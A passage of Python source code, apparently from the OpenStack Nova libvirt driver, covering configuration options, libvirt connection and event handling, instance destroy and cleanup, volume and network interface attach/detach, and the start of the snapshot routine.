cfg.BoolOpt('libvirt_inject_key',
default=True,
help='Inject the ssh public key at boot time'),
cfg.IntOpt('libvirt_inject_partition',
default=1,
help='The partition to inject to : '
'-2 => disable, -1 => inspect (libguestfs only), '
'0 => not partitioned, >0 => partition number'),
cfg.BoolOpt('use_usb_tablet',
default=True,
help='Sync virtual and real mouse cursors in Windows VMs'),
cfg.StrOpt('live_migration_uri',
default="qemu+tcp://%s/system",
help='Migration target URI '
'(any included "%s" is replaced with '
'the migration target hostname)'),
cfg.StrOpt('live_migration_flag',
default='VIR_MIGRATE_UNDEFINE_SOURCE, VIR_MIGRATE_PEER2PEER',
help='Migration flags to be set for live migration'),
cfg.StrOpt('block_migration_flag',
default='VIR_MIGRATE_UNDEFINE_SOURCE, VIR_MIGRATE_PEER2PEER, '
'VIR_MIGRATE_NON_SHARED_INC',
help='Migration flags to be set for block migration'),
cfg.IntOpt('live_migration_bandwidth',
default=0,
help='Maximum bandwidth to be used during migration, in Mbps'),
cfg.StrOpt('snapshot_image_format',
default=None,
help='Snapshot image format (valid options are : '
'raw, qcow2, vmdk, vdi). '
'Defaults to same as source image'),
cfg.StrOpt('libvirt_vif_driver',
default='nova.virt.libvirt.vif.LibvirtGenericVIFDriver',
help='The libvirt VIF driver to configure the VIFs.'),
cfg.ListOpt('libvirt_volume_drivers',
default=[
'iscsi=nova.virt.libvirt.volume.LibvirtISCSIVolumeDriver',
'local=nova.virt.libvirt.volume.LibvirtVolumeDriver',
'fake=nova.virt.libvirt.volume.LibvirtFakeVolumeDriver',
'rbd=nova.virt.libvirt.volume.LibvirtNetVolumeDriver',
'sheepdog=nova.virt.libvirt.volume.LibvirtNetVolumeDriver',
'nfs=nova.virt.libvirt.volume.LibvirtNFSVolumeDriver',
'aoe=nova.virt.libvirt.volume.LibvirtAOEVolumeDriver',
'glusterfs='
'nova.virt.libvirt.volume.LibvirtGlusterfsVolumeDriver',
'fibre_channel=nova.virt.libvirt.volume.'
'LibvirtFibreChannelVolumeDriver',
'scality='
'nova.virt.libvirt.volume.LibvirtScalityVolumeDriver',
],
help='Libvirt handlers for remote volumes.'),
cfg.StrOpt('libvirt_disk_prefix',
default=None,
help='Override the default disk prefix for the devices attached'
' to a server, which is dependent on libvirt_type. '
'(valid options are: sd, xvd, uvd, vd)'),
cfg.IntOpt('libvirt_wait_soft_reboot_seconds',
default=120,
help='Number of seconds to wait for instance to shut down after'
' soft reboot request is made. We fall back to hard reboot'
' if instance does not shutdown within this window.'),
cfg.BoolOpt('libvirt_nonblocking',
default=True,
help='Use a separated OS thread pool to realize non-blocking'
' libvirt calls'),
cfg.StrOpt('libvirt_cpu_mode',
default=None,
help='Set to "host-model" to clone the host CPU feature flags; '
'to "host-passthrough" to use the host CPU model exactly; '
'to "custom" to use a named CPU model; '
'to "none" to not set any CPU model. '
'If libvirt_type="kvm|qemu", it will default to '
'"host-model", otherwise it will default to "none"'),
cfg.StrOpt('libvirt_cpu_model',
default=None,
help='Set to a named libvirt CPU model (see names listed '
'in /usr/share/libvirt/cpu_map.xml). Only has effect if '
'libvirt_cpu_mode="custom" and libvirt_type="kvm|qemu"'),
cfg.StrOpt('libvirt_snapshots_directory',
default='$instances_path/snapshots',
help='Location where libvirt driver will store snapshots '
'before uploading them to image service'),
cfg.StrOpt('xen_hvmloader_path',
default='/usr/lib/xen/boot/hvmloader',
help='Location where the Xen hvmloader is kept'),
cfg.ListOpt('disk_cachemodes',
default=[],
help='Specific cachemodes to use for different disk types '
'e.g: ["file=directsync","block=none"]'),
cfg.StrOpt('vcpu_pin_set',
default=None,
help='Which pcpus can be used by vcpus of instance '
'e.g: "4-12,^8,15"'),
]
CONF = cfg.CONF
CONF.register_opts(libvirt_opts)
CONF.import_opt('host', 'nova.netconf')
CONF.import_opt('my_ip', 'nova.netconf')
CONF.import_opt('default_ephemeral_format', 'nova.virt.driver')
CONF.import_opt('use_cow_images', 'nova.virt.driver')
CONF.import_opt('live_migration_retry_count', 'nova.compute.manager')
CONF.import_opt('vncserver_proxyclient_address', 'nova.vnc')
CONF.import_opt('server_proxyclient_address', 'nova.spice', group='spice')
DEFAULT_FIREWALL_DRIVER = "%s.%s" % (
libvirt_firewall.__name__,
libvirt_firewall.IptablesFirewallDriver.__name__)
MAX_CONSOLE_BYTES = 102400
def patch_tpool_proxy():
"""eventlet.tpool.Proxy doesn't work with old-style class in __str__()
or __repr__() calls. See bug #962840 for details.
We perform a monkey patch to replace those two instance methods.
"""
def str_method(self):
return str(self._obj)
def repr_method(self):
return repr(self._obj)
tpool.Proxy.__str__ = str_method
tpool.Proxy.__repr__ = repr_method
patch_tpool_proxy()
VIR_DOMAIN_NOSTATE = 0
VIR_DOMAIN_RUNNING = 1
VIR_DOMAIN_BLOCKED = 2
VIR_DOMAIN_PAUSED = 3
VIR_DOMAIN_SHUTDOWN = 4
VIR_DOMAIN_SHUTOFF = 5
VIR_DOMAIN_CRASHED = 6
VIR_DOMAIN_PMSUSPENDED = 7
LIBVIRT_POWER_STATE = {
VIR_DOMAIN_NOSTATE: power_state.NOSTATE,
VIR_DOMAIN_RUNNING: power_state.RUNNING,
# NOTE(maoy): The DOMAIN_BLOCKED state is only valid in Xen.
# It means that the VM is running and the vCPU is idle. So,
# we map it to RUNNING
VIR_DOMAIN_BLOCKED: power_state.RUNNING,
VIR_DOMAIN_PAUSED: power_state.PAUSED,
# NOTE(maoy): The libvirt API doc says that DOMAIN_SHUTDOWN
# means the domain is being shut down. So technically the domain
# is still running. SHUTOFF is the real powered off state.
# But we will map both to SHUTDOWN anyway.
# http://libvirt.org/html/libvirt-libvirt.html
VIR_DOMAIN_SHUTDOWN: power_state.SHUTDOWN,
VIR_DOMAIN_SHUTOFF: power_state.SHUTDOWN,
VIR_DOMAIN_CRASHED: power_state.CRASHED,
VIR_DOMAIN_PMSUSPENDED: power_state.SUSPENDED,
}
MIN_LIBVIRT_VERSION = (0, 9, 6)
# When the above version matches/exceeds this version
# delete it & corresponding code using it
MIN_LIBVIRT_HOST_CPU_VERSION = (0, 9, 10)
MIN_LIBVIRT_CLOSE_CALLBACK_VERSION = (1, 0, 1)
# Live snapshot requirements
REQ_HYPERVISOR_LIVESNAPSHOT = "QEMU"
MIN_LIBVIRT_LIVESNAPSHOT_VERSION = (1, 0, 0)
MIN_QEMU_LIVESNAPSHOT_VERSION = (1, 3, 0)
def libvirt_error_handler(context, err):
# Just ignore instead of default outputting to stderr.
pass
class LibvirtDriver(driver.ComputeDriver):
capabilities = {
"has_imagecache": True,
"supports_recreate": True,
}
def __init__(self, virtapi, read_only=False):
super(LibvirtDriver, self).__init__(virtapi)
global libvirt
if libvirt is None:
libvirt = __import__('libvirt')
self._host_state = None
self._initiator = None
self._fc_wwnns = None
self._fc_wwpns = None
self._wrapped_conn = None
self._wrapped_conn_lock = threading.Lock()
self._caps = None
self._vcpu_total = 0
self.read_only = read_only
self.firewall_driver = firewall.load_driver(
DEFAULT_FIREWALL_DRIVER,
self.virtapi,
get_connection=self._get_connection)
vif_class = importutils.import_class(CONF.libvirt_vif_driver)
self.vif_driver = vif_class(self._get_connection)
self.volume_drivers = driver.driver_dict_from_config(
CONF.libvirt_volume_drivers, self)
self._host_state = None
self._event_queue = None
self._disk_cachemode = None
self.image_cache_manager = imagecache.ImageCacheManager()
self.image_backend = imagebackend.Backend(CONF.use_cow_images)
self.disk_cachemodes = {}
self.valid_cachemodes = ["default",
"none",
"writethrough",
"writeback",
"directsync",
"writethrough",
"unsafe",
]
for mode_str in CONF.disk_cachemodes:
disk_type, sep, cache_mode = mode_str.partition('=')
if cache_mode not in self.valid_cachemodes:
LOG.warn(_('Invalid cachemode %(cache_mode)s specified '
'for disk type %(disk_type)s.'),
{'cache_mode': cache_mode, 'disk_type': disk_type})
continue
self.disk_cachemodes[disk_type] = cache_mode
@property
def disk_cachemode(self):
if self._disk_cachemode is None:
# We prefer 'none' for consistent performance, host crash
# safety & migration correctness by avoiding host page cache.
# Some filesystems (eg GlusterFS via FUSE) don't support
# O_DIRECT though. For those we fallback to 'writethrough'
# which gives host crash safety, and is safe for migration
# provided the filesystem is cache coherant (cluster filesystems
# typically are, but things like NFS are not).
self._disk_cachemode = "none"
if not self._supports_direct_io(CONF.instances_path):
self._disk_cachemode = "writethrough"
return self._disk_cachemode
@property
def host_state(self):
if not self._host_state:
self._host_state = HostState(self)
return self._host_state
def set_cache_mode(self, conf):
"""Set cache mode on LibvirtConfigGuestDisk object."""
try:
source_type = conf.source_type
driver_cache = conf.driver_cache
except AttributeError:
return
cache_mode = self.disk_cachemodes.get(source_type,
driver_cache)
conf.driver_cache = cache_mode
def has_min_version(self, lv_ver=None, hv_ver=None, hv_type=None):
def _munge_version(ver):
return ver[0] * 1000000 + ver[1] * 1000 + ver[2]
try:
if lv_ver is not None:
libvirt_version = self._conn.getLibVersion()
if libvirt_version < _munge_version(lv_ver):
return False
if hv_ver is not None:
hypervisor_version = self._conn.getVersion()
if hypervisor_version < _munge_version(hv_ver):
return False
if hv_type is not None:
hypervisor_type = self._conn.getType()
if hypervisor_type != hv_type:
return False
return True
except Exception:
return False
def _native_thread(self):
"""Receives async events coming in from libvirtd.
This is a native thread which runs the default
libvirt event loop implementation. This processes
any incoming async events from libvirtd and queues
them for later dispatch. This thread is only
permitted to use libvirt python APIs, and the
driver.queue_event method. In particular any use
of logging is forbidden, since it will confuse
eventlet's greenthread integration
"""
while True:
libvirt.virEventRunDefaultImpl()
def _dispatch_thread(self):
"""Dispatches async events coming in from libvirtd.
This is a green thread which waits for events to
arrive from the libvirt event loop thread. This
then dispatches the events to the compute manager.
"""
while True:
self._dispatch_events()
@staticmethod
def _event_lifecycle_callback(conn, dom, event, detail, opaque):
"""Receives lifecycle events from libvirt.
NB: this method is executing in a native thread, not
an eventlet coroutine. It can only invoke other libvirt
APIs, or use self.queue_event(). Any use of logging APIs
in particular is forbidden.
"""
self = opaque
uuid = dom.UUIDString()
transition = None
if event == libvirt.VIR_DOMAIN_EVENT_STOPPED:
transition = virtevent.EVENT_LIFECYCLE_STOPPED
elif event == libvirt.VIR_DOMAIN_EVENT_STARTED:
transition = virtevent.EVENT_LIFECYCLE_STARTED
elif event == libvirt.VIR_DOMAIN_EVENT_SUSPENDED:
transition = virtevent.EVENT_LIFECYCLE_PAUSED
elif event == libvirt.VIR_DOMAIN_EVENT_RESUMED:
transition = virtevent.EVENT_LIFECYCLE_RESUMED
if transition is not None:
self._queue_event(virtevent.LifecycleEvent(uuid, transition))
def _queue_event(self, event):
"""Puts an event on the queue for dispatch.
This method is called by the native event thread to
put events on the queue for later dispatch by the
green thread.
"""
if self._event_queue is None:
LOG.debug("Event loop thread is not active, "
"discarding event %s" % event)
return
# Queue the event...
self._event_queue.put(event)
# ...then wakeup the green thread to dispatch it
c = ' '.encode()
self._event_notify_send.write(c)
self._event_notify_send.flush()
def _dispatch_events(self):
"""Wait for & dispatch events from native thread
Blocks until native thread indicates some events
are ready. Then dispatches all queued events.
"""
# Wait to be notified that there are some
# events pending
try:
_c = self._event_notify_recv.read(1)
assert _c
except ValueError:
return # will be raised when pipe is closed
# Process as many events as possible without
# blocking
while not self._event_queue.empty():
try:
event = self._event_queue.get(block=False)
self.emit_event(event)
except native_Queue.Empty:
pass
def _init_events_pipe(self):
"""Create a self-pipe for the native thread to synchronize on.
This code is taken from the eventlet tpool module, under terms
of the Apache License v2.0.
"""
self._event_queue = native_Queue.Queue()
try:
rpipe, wpipe = os.pipe()
self._event_notify_send = greenio.GreenPipe(wpipe, 'wb', 0)
self._event_notify_recv = greenio.GreenPipe(rpipe, 'rb', 0)
except (ImportError, NotImplementedError):
# This is Windows compatibility -- use a socket instead
# of a pipe because pipes don't really exist on Windows.
sock = eventlet_util.__original_socket__(socket.AF_INET,
socket.SOCK_STREAM)
sock.bind(('localhost', 0))
sock.listen(50)
csock = eventlet_util.__original_socket__(socket.AF_INET,
socket.SOCK_STREAM)
csock.connect(('localhost', sock.getsockname()[1]))
nsock, addr = sock.accept()
self._event_notify_send = nsock.makefile('wb', 0)
gsock = greenio.GreenSocket(csock)
self._event_notify_recv = gsock.makefile('rb', 0)
def _init_events(self):
"""Initializes the libvirt events subsystem.
This requires running a native thread to provide the
libvirt event loop integration. This forwards events
to a green thread which does the actual dispatching.
"""
self._init_events_pipe()
LOG.debug("Starting native event thread")
event_thread = native_threading.Thread(target=self._native_thread)
event_thread.setDaemon(True)
event_thread.start()
LOG.debug("Starting green dispatch thread")
eventlet.spawn(self._dispatch_thread)
def init_host(self, host):
if not self.has_min_version(MIN_LIBVIRT_VERSION):
major = MIN_LIBVIRT_VERSION[0]
minor = MIN_LIBVIRT_VERSION[1]
micro = MIN_LIBVIRT_VERSION[2]
LOG.error(_('Nova requires libvirt version '
'%(major)i.%(minor)i.%(micro)i or greater.'),
{'major': major, 'minor': minor, 'micro': micro})
libvirt.registerErrorHandler(libvirt_error_handler, None)
libvirt.virEventRegisterDefaultImpl()
self._init_events()
def _get_connection(self):
with self._wrapped_conn_lock:
wrapped_conn = self._wrapped_conn
if not wrapped_conn or not self._test_connection(wrapped_conn):
LOG.debug(_('Connecting to libvirt: %s'), self.uri())
if not CONF.libvirt_nonblocking:
wrapped_conn = self._connect(self.uri(), self.read_only)
else:
wrapped_conn = tpool.proxy_call(
(libvirt.virDomain, libvirt.virConnect),
self._connect, self.uri(), self.read_only)
with self._wrapped_conn_lock:
self._wrapped_conn = wrapped_conn
try:
LOG.debug("Registering for lifecycle events %s" % str(self))
wrapped_conn.domainEventRegisterAny(
None,
libvirt.VIR_DOMAIN_EVENT_ID_LIFECYCLE,
self._event_lifecycle_callback,
self)
except Exception:
LOG.warn(_("URI %s does not support events"),
self.uri())
if self.has_min_version(MIN_LIBVIRT_CLOSE_CALLBACK_VERSION):
try:
LOG.debug("Registering for connection events: %s" %
str(self))
wrapped_conn.registerCloseCallback(
self._close_callback, None)
except libvirt.libvirtError:
LOG.debug(_("URI %s does not support connection events"),
self.uri())
return wrapped_conn
_conn = property(_get_connection)
def _close_callback(self, conn, reason, opaque):
with self._wrapped_conn_lock:
if conn == self._wrapped_conn:
LOG.info(_("Connection to libvirt lost: %s") % reason)
self._wrapped_conn = None
@staticmethod
def _test_connection(conn):
try:
conn.getLibVersion()
return True
except libvirt.libvirtError as e:
if (e.get_error_code() in (libvirt.VIR_ERR_SYSTEM_ERROR,
libvirt.VIR_ERR_INTERNAL_ERROR) and
e.get_error_domain() in (libvirt.VIR_FROM_REMOTE,
libvirt.VIR_FROM_RPC)):
LOG.debug(_('Connection to libvirt broke'))
return False
raise
@staticmethod
def uri():
if CONF.libvirt_type == 'uml':
uri = CONF.libvirt_uri or 'uml:///system'
elif CONF.libvirt_type == 'xen':
uri = CONF.libvirt_uri or 'xen:///'
elif CONF.libvirt_type == 'lxc':
uri = CONF.libvirt_uri or 'lxc:///'
else:
uri = CONF.libvirt_uri or 'qemu:///system'
return uri
@staticmethod
def _connect(uri, read_only):
def _connect_auth_cb(creds, opaque):
if len(creds) == 0:
return 0
LOG.warning(
_("Can not handle authentication request for %d credentials")
% len(creds))
raise exception.NovaException(
_("Can not handle authentication request for %d credentials")
% len(creds))
auth = [[libvirt.VIR_CRED_AUTHNAME,
libvirt.VIR_CRED_ECHOPROMPT,
libvirt.VIR_CRED_REALM,
libvirt.VIR_CRED_PASSPHRASE,
libvirt.VIR_CRED_NOECHOPROMPT,
libvirt.VIR_CRED_EXTERNAL],
_connect_auth_cb,
None]
try:
if read_only:
return libvirt.openReadOnly(uri)
else:
return libvirt.openAuth(uri, auth, 0)
except libvirt.libvirtError as ex:
LOG.exception(_("Connection to libvirt failed: %s"), ex)
payload = dict(ip=LibvirtDriver.get_host_ip_addr(),
method='_connect',
reason=ex)
notifier.notify(nova_context.get_admin_context(),
notifier.publisher_id('compute'),
'compute.libvirt.error',
notifier.ERROR,
payload)
pass
def get_num_instances(self):
"""Efficient override of base instance_exists method."""
return self._conn.numOfDomains()
def instance_exists(self, instance_name):
"""Efficient override of base instance_exists method."""
try:
self._lookup_by_name(instance_name)
return True
except exception.NovaException:
return False
def legacy_nwinfo(self):
return True
# TODO(Shrews): Remove when libvirt Bugzilla bug # 836647 is fixed.
def list_instance_ids(self):
if self._conn.numOfDomains() == 0:
return []
return self._conn.listDomainsID()
def list_instances(self):
names = []
for domain_id in self.list_instance_ids():
try:
# We skip domains with ID 0 (hypervisors).
if domain_id != 0:
domain = self._lookup_by_id(domain_id)
names.append(domain.name())
except exception.InstanceNotFound:
# Ignore deleted instance while listing
continue
# extend instance list to contain also defined domains
names.extend([vm for vm in self._conn.listDefinedDomains()
if vm not in names])
return names
def list_instance_uuids(self):
uuids = set()
for domain_id in self.list_instance_ids():
try:
# We skip domains with ID 0 (hypervisors).
if domain_id != 0:
domain = self._lookup_by_id(domain_id)
uuids.add(domain.UUIDString())
except exception.InstanceNotFound:
# Ignore deleted instance while listing
continue
# extend instance list to contain also defined domains
for domain_name in self._conn.listDefinedDomains():
try:
uuids.add(self._lookup_by_name(domain_name).UUIDString())
except exception.InstanceNotFound:
# Ignore deleted instance while listing
continue
return list(uuids)
def plug_vifs(self, instance, network_info):
"""Plug VIFs into networks."""
for (network, mapping) in network_info:
self.vif_driver.plug(instance, (network, mapping))
def unplug_vifs(self, instance, network_info):
"""Unplug VIFs from networks."""
for (network, mapping) in network_info:
self.vif_driver.unplug(instance, (network, mapping))
def _destroy(self, instance):
try:
virt_dom = self._lookup_by_name(instance['name'])
except exception.NotFound:
virt_dom = None
# If the instance is already terminated, we're still happy
# Otherwise, destroy it
old_domid = -1
if virt_dom is not None:
try:
old_domid = virt_dom.ID()
virt_dom.destroy()
except libvirt.libvirtError as e:
is_okay = False
errcode = e.get_error_code()
if errcode == libvirt.VIR_ERR_OPERATION_INVALID:
# If the instance is already shut off, we get this:
# Code=55 Error=Requested operation is not valid:
# domain is not running
(state, _max_mem, _mem, _cpus, _t) = virt_dom.info()
state = LIBVIRT_POWER_STATE[state]
if state == power_state.SHUTDOWN:
is_okay = True
elif errcode == libvirt.VIR_ERR_OPERATION_TIMEOUT:
LOG.warn(_("Cannot destroy instance, operation time out"),
instance=instance)
reason = _("operation time out")
raise exception.InstancePowerOffFailure(reason=reason)
if not is_okay:
with excutils.save_and_reraise_exception():
LOG.error(_('Error from libvirt during destroy. '
'Code=%(errcode)s Error=%(e)s'),
{'errcode': errcode, 'e': e},
instance=instance)
def _wait_for_destroy(expected_domid):
"""Called at an interval until the VM is gone."""
# NOTE(vish): If the instance disappears during the destroy
# we ignore it so the cleanup can still be
# attempted because we would prefer destroy to
# never fail.
try:
dom_info = self.get_info(instance)
state = dom_info['state']
new_domid = dom_info['id']
except exception.NotFound:
LOG.error(_("During wait destroy, instance disappeared."),
instance=instance)
raise loopingcall.LoopingCallDone()
if state == power_state.SHUTDOWN:
LOG.info(_("Instance destroyed successfully."),
instance=instance)
raise loopingcall.LoopingCallDone()
# NOTE(wangpan): If the instance was booted again after destroy,
# this may be a endless loop, so check the id of
# domain here, if it changed and the instance is
# still running, we should destroy it again.
# see https://bugs.launchpad.net/nova/+bug/1111213 for more details
if new_domid != expected_domid:
LOG.info(_("Instance may be started again."),
instance=instance)
kwargs['is_running'] = True
raise loopingcall.LoopingCallDone()
kwargs = {'is_running': False}
timer = loopingcall.FixedIntervalLoopingCall(_wait_for_destroy,
old_domid)
timer.start(interval=0.5).wait()
if kwargs['is_running']:
LOG.info(_("Going to destroy instance again."), instance=instance)
self._destroy(instance)
def destroy(self, instance, network_info, block_device_info=None,
destroy_disks=True):
self._destroy(instance)
self._cleanup(instance, network_info, block_device_info, destroy_disks)
def _undefine_domain(self, instance):
try:
virt_dom = self._lookup_by_name(instance['name'])
except exception.NotFound:
virt_dom = None
if virt_dom:
try:
try:
virt_dom.undefineFlags(
libvirt.VIR_DOMAIN_UNDEFINE_MANAGED_SAVE)
except libvirt.libvirtError:
LOG.debug(_("Error from libvirt during undefineFlags."
" Retrying with undefine"), instance=instance)
virt_dom.undefine()
except AttributeError:
# NOTE(vish): Older versions of libvirt don't support
# undefine flags, so attempt to do the
# right thing.
try:
if virt_dom.hasManagedSaveImage(0):
virt_dom.managedSaveRemove(0)
except AttributeError:
pass
virt_dom.undefine()
except libvirt.libvirtError as e:
with excutils.save_and_reraise_exception():
errcode = e.get_error_code()
LOG.error(_('Error from libvirt during undefine. '
'Code=%(errcode)s Error=%(e)s') %
{'errcode': errcode, 'e': e}, instance=instance)
def _cleanup(self, instance, network_info, block_device_info,
destroy_disks):
self._undefine_domain(instance)
self.unplug_vifs(instance, network_info)
retry = True
while retry:
try:
self.firewall_driver.unfilter_instance(instance,
network_info=network_info)
except libvirt.libvirtError as e:
try:
state = self.get_info(instance)['state']
except exception.NotFound:
state = power_state.SHUTDOWN
if state != power_state.SHUTDOWN:
LOG.warn(_("Instance may be still running, destroy "
"it again."), instance=instance)
self._destroy(instance)
else:
retry = False
errcode = e.get_error_code()
LOG.error(_('Error from libvirt during unfilter. '
'Code=%(errcode)s Error=%(e)s') %
{'errcode': errcode, 'e': e},
instance=instance)
reason = "Error unfiltering instance."
raise exception.InstanceTerminationFailure(reason=reason)
except Exception:
retry = False
raise
else:
retry = False
# FIXME(wangpan): if the instance is booted again here, such as the
# the soft reboot operation boot it here, it will
# become "running deleted", should we check and destroy
# it at the end of this method?
# NOTE(vish): we disconnect from volumes regardless
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
disk_dev = vol['mount_device'].rpartition("/")[2]
self.volume_driver_method('disconnect_volume',
connection_info,
disk_dev)
if destroy_disks:
target = libvirt_utils.get_instance_path(instance)
LOG.info(_('Deleting instance files %s'), target,
instance=instance)
if os.path.exists(target):
# If we fail to get rid of the directory
# tree, this shouldn't block deletion of
# the instance as whole.
try:
shutil.rmtree(target)
except OSError as e:
LOG.error(_('Failed to cleanup directory %(target)s: '
'%(e)s'), {'target': target, 'e': e})
#NOTE(bfilippov): destroy all LVM disks for this instance
self._cleanup_lvm(instance)
def _cleanup_lvm(self, instance):
"""Delete all LVM disks for given instance object."""
disks = self._lvm_disks(instance)
if disks:
libvirt_utils.remove_logical_volumes(*disks)
def _lvm_disks(self, instance):
"""Returns all LVM disks for given instance object."""
if CONF.libvirt_images_volume_group:
vg = os.path.join('/dev', CONF.libvirt_images_volume_group)
if not os.path.exists(vg):
return []
pattern = '%s_' % instance['name']
def belongs_to_instance(disk):
return disk.startswith(pattern)
def fullpath(name):
return os.path.join(vg, name)
logical_volumes = libvirt_utils.list_logical_volumes(vg)
disk_names = filter(belongs_to_instance, logical_volumes)
disks = map(fullpath, disk_names)
return disks
return []
def get_volume_connector(self, instance):
if not self._initiator:
self._initiator = libvirt_utils.get_iscsi_initiator()
if not self._initiator:
LOG.debug(_('Could not determine iscsi initiator name'),
instance=instance)
if not self._fc_wwnns:
self._fc_wwnns = libvirt_utils.get_fc_wwnns()
if not self._fc_wwnns or len(self._fc_wwnns) == 0:
LOG.debug(_('Could not determine fibre channel '
'world wide node names'),
instance=instance)
if not self._fc_wwpns:
self._fc_wwpns = libvirt_utils.get_fc_wwpns()
if not self._fc_wwpns or len(self._fc_wwpns) == 0:
LOG.debug(_('Could not determine fibre channel '
'world wide port names'),
instance=instance)
connector = {'ip': CONF.my_ip,
'host': CONF.host}
if self._initiator:
connector['initiator'] = self._initiator
if self._fc_wwnns and self._fc_wwpns:
connector["wwnns"] = self._fc_wwnns
connector["wwpns"] = self._fc_wwpns
return connector
def _cleanup_resize(self, instance, network_info):
target = libvirt_utils.get_instance_path(instance) + "_resize"
if os.path.exists(target):
shutil.rmtree(target)
if instance['host'] != CONF.host:
self._undefine_domain(instance)
self.unplug_vifs(instance, network_info)
self.firewall_driver.unfilter_instance(instance, network_info)
def volume_driver_method(self, method_name, connection_info,
*args, **kwargs):
driver_type = connection_info.get('driver_volume_type')
if driver_type not in self.volume_drivers:
raise exception.VolumeDriverNotFound(driver_type=driver_type)
driver = self.volume_drivers[driver_type]
method = getattr(driver, method_name)
return method(connection_info, *args, **kwargs)
def attach_volume(self, connection_info, instance, mountpoint):
instance_name = instance['name']
virt_dom = self._lookup_by_name(instance_name)
disk_dev = mountpoint.rpartition("/")[2]
disk_info = {
'dev': disk_dev,
'bus': blockinfo.get_disk_bus_for_disk_dev(CONF.libvirt_type,
disk_dev),
'type': 'disk',
}
conf = self.volume_driver_method('connect_volume',
connection_info,
disk_info)
self.set_cache_mode(conf)
try:
# NOTE(vish): We can always affect config because our
# domains are persistent, but we should only
# affect live if the domain is running.
flags = libvirt.VIR_DOMAIN_AFFECT_CONFIG
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
if state == power_state.RUNNING:
flags |= libvirt.VIR_DOMAIN_AFFECT_LIVE
virt_dom.attachDeviceFlags(conf.to_xml(), flags)
except Exception as ex:
if isinstance(ex, libvirt.libvirtError):
errcode = ex.get_error_code()
if errcode == libvirt.VIR_ERR_OPERATION_FAILED:
self.volume_driver_method('disconnect_volume',
connection_info,
disk_dev)
raise exception.DeviceIsBusy(device=disk_dev)
with excutils.save_and_reraise_exception():
self.volume_driver_method('disconnect_volume',
connection_info,
disk_dev)
@staticmethod
def _get_disk_xml(xml, device):
"""Returns the xml for the disk mounted at device."""
try:
doc = etree.fromstring(xml)
except Exception:
return None
ret = doc.findall('./devices/disk')
for node in ret:
for child in node.getchildren():
if child.tag == 'target':
if child.get('dev') == device:
return etree.tostring(node)
def _get_existing_domain_xml(self, instance, network_info,
block_device_info=None):
try:
virt_dom = self._lookup_by_name(instance['name'])
xml = virt_dom.XMLDesc(0)
except exception.InstanceNotFound:
disk_info = blockinfo.get_disk_info(CONF.libvirt_type,
instance,
block_device_info)
xml = self.to_xml(instance, network_info, disk_info,
block_device_info=block_device_info)
return xml
def detach_volume(self, connection_info, instance, mountpoint):
instance_name = instance['name']
disk_dev = mountpoint.rpartition("/")[2]
try:
virt_dom = self._lookup_by_name(instance_name)
xml = self._get_disk_xml(virt_dom.XMLDesc(0), disk_dev)
if not xml:
raise exception.DiskNotFound(location=disk_dev)
else:
# NOTE(vish): We can always affect config because our
# domains are persistent, but we should only
# affect live if the domain is running.
flags = libvirt.VIR_DOMAIN_AFFECT_CONFIG
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
if state == power_state.RUNNING:
flags |= libvirt.VIR_DOMAIN_AFFECT_LIVE
virt_dom.detachDeviceFlags(xml, flags)
except libvirt.libvirtError as ex:
# NOTE(vish): This is called to cleanup volumes after live
# migration, so we should still disconnect even if
# the instance doesn't exist here anymore.
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
# NOTE(vish):
LOG.warn(_("During detach_volume, instance disappeared."))
else:
raise
self.volume_driver_method('disconnect_volume',
connection_info,
disk_dev)
@exception.wrap_exception()
def attach_interface(self, instance, image_meta, network_info):
virt_dom = self._lookup_by_name(instance['name'])
for (network, mapping) in network_info:
self.vif_driver.plug(instance, (network, mapping))
self.firewall_driver.setup_basic_filtering(instance,
[(network, mapping)])
cfg = self.vif_driver.get_config(instance, network, mapping,
image_meta)
try:
flags = libvirt.VIR_DOMAIN_AFFECT_CONFIG
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
if state == power_state.RUNNING:
flags |= libvirt.VIR_DOMAIN_AFFECT_LIVE
virt_dom.attachDeviceFlags(cfg.to_xml(), flags)
except libvirt.libvirtError:
LOG.error(_('attaching network adapter failed.'),
instance=instance)
self.vif_driver.unplug(instance, (network, mapping))
raise exception.InterfaceAttachFailed(instance)
@exception.wrap_exception()
def detach_interface(self, instance, network_info):
virt_dom = self._lookup_by_name(instance['name'])
for (network, mapping) in network_info:
cfg = self.vif_driver.get_config(instance, network, mapping, None)
try:
self.vif_driver.unplug(instance, (network, mapping))
flags = libvirt.VIR_DOMAIN_AFFECT_CONFIG
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
if state == power_state.RUNNING:
flags |= libvirt.VIR_DOMAIN_AFFECT_LIVE
virt_dom.detachDeviceFlags(cfg.to_xml(), flags)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
LOG.warn(_("During detach_interface, "
"instance disappeared."),
instance=instance)
else:
LOG.error(_('detaching network adapter failed.'),
instance=instance)
raise exception.InterfaceDetachFailed(instance)
def snapshot(self, context, instance, image_href, update_task_state):
"""Create snapshot from a running VM instance.
This command only works with qemu 0.14+
"""
try:
virt_dom = self._lookup_by_name(instance['name'])
except exception.InstanceNotFound:
raise exception.InstanceNotRunning(instance_id=instance['uuid'])
(image_service, image_id) = glance.get_remote_image_service(
context, instance['image_ref'])
try:
base = image_service.show(context, image_id)
except exception.ImageNotFound:
base = {}
_image_service = glance.get_remote_image_service(context, image_href)
snapshot_image_service, snapshot_image_id = _image_service
snapshot = snapshot_image_service.show(context, snapshot_image_id)
metadata = {'is_public': False,
'status': 'active',
'name': snapshot['name'],
'properties': {
'kernel_id': instance['kernel_id'],
'image_location': 'snapshot',
'image_state': 'available',
'owner_id': instance['project_id'],
'ramdisk_id': instance['ramdisk_id'],
}
}
disk_path = libvirt_utils.find_disk(virt_dom)
source_format = libvirt_utils.get_disk_type(disk_path)
image_format = CONF.snapshot_image_format or source_format
# NOTE(bfilippov): save lvm as raw
if image_format == 'lvm':
image_format = 'raw'
# NOTE(vish): glance forces ami disk format to be ami
if base.get('disk_format') == 'ami':
metadata['disk_format'] = 'ami'
else:
metadata['disk_format'] = image_format
metadata['container_format'] = base.get('container_format', 'bare')
snapshot_name = uuid.uuid4().hex
(state, _max_mem, _mem, _cpus, _t) = virt_dom.info()
